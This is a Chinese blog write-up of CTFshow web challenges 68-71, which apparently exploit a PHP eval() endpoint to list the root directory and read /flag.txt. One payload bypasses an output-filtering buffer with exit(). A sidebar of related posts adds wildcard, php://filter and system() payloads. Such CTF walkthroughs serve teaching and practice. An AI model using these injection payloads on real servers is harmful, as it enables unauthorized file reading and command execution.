CTFshow web(php命令执行 68-71)

最新推荐文章于 2025-09-04 20:00:32 发布
原创 最新推荐文章于 2025-09-04 20:00:32 发布 · 1.3k 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #开发语言 #CTFshow #web安全

文章讲述了在PHP代码审计中,作者逐步分析了一个包含用户提交payload的脚本,展示了如何通过代码审计技巧绕过输出过滤,最终成功提取flag.txt文件的过程。

                                                                       web68

         

还是那句话,没看到flag在哪,那就优先找到flag位置

这里c=var_dump(scandir("/"));

直接输出根目录的位置,然后查看源代码,发现flag位置为flag.txt

知道flag在根目录下面的flag.txt直接访问就好了

c=include('/flag.txt');

                                                                        web69

payload:c=include('/flag.txt');

上题payload没有禁用,直接白嫖!

                                                                        web70

payload:c=include('/flag.txt');

上题payload没有禁用,直接白嫖!

                                                                        web71

首先拿到一串代码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗?
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

代码审计:

  • 使用 ob_get_contents() 和 ob_end_clean() 函数获取并清除输出缓冲区中的内容。这是为了捕获执行命令后的结果,并将其传递给 preg_replace() 函数进行处理。

  • 使用 preg_replace("/[0-9]|[a-z]/i","?",$s) 将输出结果中的数字和小写字母替换为 ?,然后将结果进行输出。    

ps:害怕小白不懂,解释下。缓冲区(Buffer)是计算机系统中的一块内存区域,用于临时存储数据。它可以在数据传输之间起到缓冲和调节作用,以提高数据传输的效率或解决传输速度不匹配的问题。

先把上题payload看看能不能白嫖啊

c=include('/flag.txt');

好小子,看来你是要上天啊!

根据代码审计结果,既然会把输出结果中的数字和小写字母替换为 ?

那不用缓冲区不就好了!

最后加一个exit();

c=include('/flag.txt');exit();

真诚希望我的文章能够帮助大家,谢谢!过年写下这篇文章总觉得还得加上一句:

祝愿大家龙年吉祥!                          

补天阁
关注
CTFshow 命令执行 web68
Kradress的博客
12-04 444
目录源码思路题解总结 源码 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19 思路 根据提示,源码中可能存在highlight_file()函数,然后在php.ini中禁用了highlight_file().源码应该还是上题的. include和require能执行文件中的代码,因为flag不是php代码,所以只能以文本的形式显示 题解 发现
CTFSHOW大赛原题篇(web680-web695)
羽的博客
02-23 3362
CTFSHOW大赛原题篇 web680 code=phpinfo(); 先看下disable_function,有一堆过滤。并且open_basedir做了目录限制。 r然后看下当前目录下的文件 code=var_dump(scandir(".")); 发现一个文件secret_you_never_know 直接访问就拿到flag了 。。。。。。(大无语) web681 登录的时候抓个包,比如我们传name=123会返回sql语句 select count(*) from ctfshow_users whe
[ctfshow web入门] web68 命令执行,禁用函数highlight_file
qq_50332504的博客
05-10 387
本文介绍了在PHP中通过include函数结合php://filter流来读取文件内容的方法。由于highlight_file被禁用,作者使用了convert.base64-encode和convert.iconv.utf8.utf16过滤器来读取index.php和flag.php文件,并展示了如何通过var_dump(scandir('/'))来列出目录内容。最终,作者通过直接include文件路径成功读取了/flag.txt的内容。文章提供了多种读取文件的方式,并展示了不同方法的效果。
ctfshowWeb应用安全与防护(第一章)wp
最新发布
2402_86423757的博客
09-04 2035
查看网页源代码告诉我们了password的base64,直接解码。
ctfshow命令执行 web入门 web64-68
m0_62207170的博客
04-08 395
ctfshow命令执行 web入门 web64-68
ctfshow学习记录-web入门(命令执行59-68
龟速更新的九某人
06-13 480
ctfshow学习记录-web入门(命令执行web59-68
CTFshow web入门 web29-------web56 命令执行wp
2202_75289892的博客
07-30 1045
过滤了flag,可见是文件名过滤,需要查看flag.php 或者flag.txt等文件。此外 读取文件利用cat函数,输出利用system、passthru。3.双引号绕过 fl''ag''.php。2.反斜杠绕过 fl\ag.php。1.通配符绕过 fla?还有特殊变量$1、内联执行等。
CTFshow web入门 web57------- web77命令执行wp
2202_75289892的博客
08-06 719
过滤了数字字母以及一些符号,输入参数c,题目提示了flag在36.php,由于输入参数后添加了cat c.php,只需要输入36即可,但数字被过滤。$((~ $(())))=-1 对其取反。因此可以37个 -1相加,再取反。
CTFshow web入门 web118------- web124命令执行wp
2202_75289892的博客
08-08 717
打开是一个输入框先尝试哪些字符会被过滤,输入小写字母、数字、!等会回显evil input而大写字母、{}、?等不会被过滤查看网页源代码,system($code) 输入值赋值给code,然后放入system中想要输入nl flag.php,但是字母都被过滤了${PATH:~A} 代表路径变量的最后一位,一般是n${PWD:~A} 代表根目录的最后一位,网站的默认根目录是var/www/html ,最后一位是l所以二者合起来就是nl 而flag.php用??????
ctfshow web入门 web29-40 命令执行-1
Azure_lyn的博客
08-13 791
本人初学,如有错误欢迎批评指正~
CTFSHOW-WEB入门-命令执行54-70
2301_80024722的博客
02-02 1058
会读取gzip文件并将其内容输出到标准输出设备。如果文件不是gzip格式,readgzfile会直接从文件中读取内容而不进行解压。这些字符 ‘c’、‘a’ 和 ‘t’ 可以以任意顺序出现,并且它们之间可以有任意字符(包括零个字符)分隔。在Linux下可以在当前目录下执行可执行文件或者命令。运算进行解析,由于这道题的。通过查阅资料可以知道,在。在进行按位取反就可以得到。,那么我们只需要拼接出。进行按位取反可以得到。
CTFshow web66 67 68 69 70 71
ChenD的学习笔记
11-13 1171
CTFshow web66 web67 web68 web69 web70 web71
ctfshow--web--命令执行
whisper921的博客
02-11 3621
web29 可以看到过滤了flag字样 但我们可以通过通配符绕过flag,比如用fla?来表示flag 先用?c=system('ls');来观察该目录下存在的文件,发现了flag.php 然后使用?c=system('cp fla?.php 1.txt');将flag.php的内容配对到1.txt中 然后访问1.txt即可得到flag 得到flag web30 发现新过滤了system以及php这两个关键字 我们此时可以通过反引号```来代替system,继...
CTFshow web入门——文件包含
小元砸的博客
02-07 4431
Web 78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 一.分析代码: 使用 include进行了文件包含 二.解题过程: 构造playload: ?file=php://filter/read=convert.base64-encode/resource=flag.php Web 79 <?p
CTFSHOW web680-780(大赛原题)
qq_37561898的博客
01-29 4406
ctfshow CTF ctfshow大赛原题
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 1052
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval中的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
ctfshow web入门之命令执行
uuzfumo的博客
12-17 1237
命令执行姿势
CTFHUB 目录遍历
qq_75120258的博客
09-23 513
出现了四个文件夹,他提示FLAG_in_here,flag就在这四个文件夹里,依次点进这4个文件夹去,其他三个文件夹里都没有东西,在第一个文件夹里出现了flag.txt,点进去。flag就在这里面,得到答案啦。继续 点击开始寻找FLAG。
CTFshow-命令执行
weixin_44770698的博客
06-25 3595
ctfshow-web 命令执行
ctfshow web入门命令执行41
01-25
### CTFShow Web 入门命令执行挑战解析 在处理CTFShow平台中的Web类别入门级别命令执行挑战时,理解如何利用PHP代码注入来实现远程命令执行(RCE)至关重要。通过分析给定的参数传递方式以及服务器端脚本的行为模式,可以找到绕过简单过滤机制的方法。 对于此类题目,通常会提供一个带有漏洞的应用程序接口,允许攻击者通过特定输入点提交恶意数据。在这个例子中,存在两个主要入口用于测试:一个是基于URL查询字符串的方式;另一个则是表单POST请求方法[^3]。 #### 利用PHP函数进行命令执行 当遇到能够控制部分PHP源码的情况时,可以通过精心构造payload触发底层操作系统指令调用。例如,在给出的例子中有如下形式: ```php <?php echo `ls`; ?> ``` 这段代码会在当前工作目录下执行Linux/Unix系统的`ls`命令并显示其输出结果。为了进一步探索文件结构或读取敏感信息,可替换为其他有用的操作系统命令组合,如`cat`、`find`等。 针对此题目的具体场景,如果目标是获取某个特定PHP文件的内容,则可以根据上下文调整上述模板以适应实际需求。比如要逆向打印整个`ctfshow.php`文件内容,可以构建这样的HTTP GET请求: ``` ?v1=1&v2=system("tac%20ctfshow.php")/* ``` 这里使用了GNU/Linux特有的`tac`工具代替常见的`cat`命令,从而实现了从最后一行到第一行反序展示文本的效果。同时注意到了SQL注释符`/* */`的存在,这有助于屏蔽掉后续不必要的字符干扰。 另外一种常见技巧涉及直接访问内部变量状态,这对于调试和信息收集非常有帮助。假设想要查看名为`$ctfshow`的数据项详情,那么就可以发送类似下面所示的链接地址: ``` ?v1=1&v2=var_dump($ctfshow); ``` 这种方法依赖于PHP内置诊断功能——`var_dump()`函数,它能清晰地呈现出传入表达式的类型及其值。 #### 绕过基本防护措施 尽管某些情况下可能存在简单的正则表达式匹配型WAF(Web Application Firewall),但只要掌握了它们的工作原理就很容易规避这些限制。观察提供的WAF检测逻辑可知,主要是对一些关键字进行了黑名单过滤[^4]。因此,在设计最终有效载荷之前应当仔细考虑怎样巧妙避开那些被监控的关键字列表。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值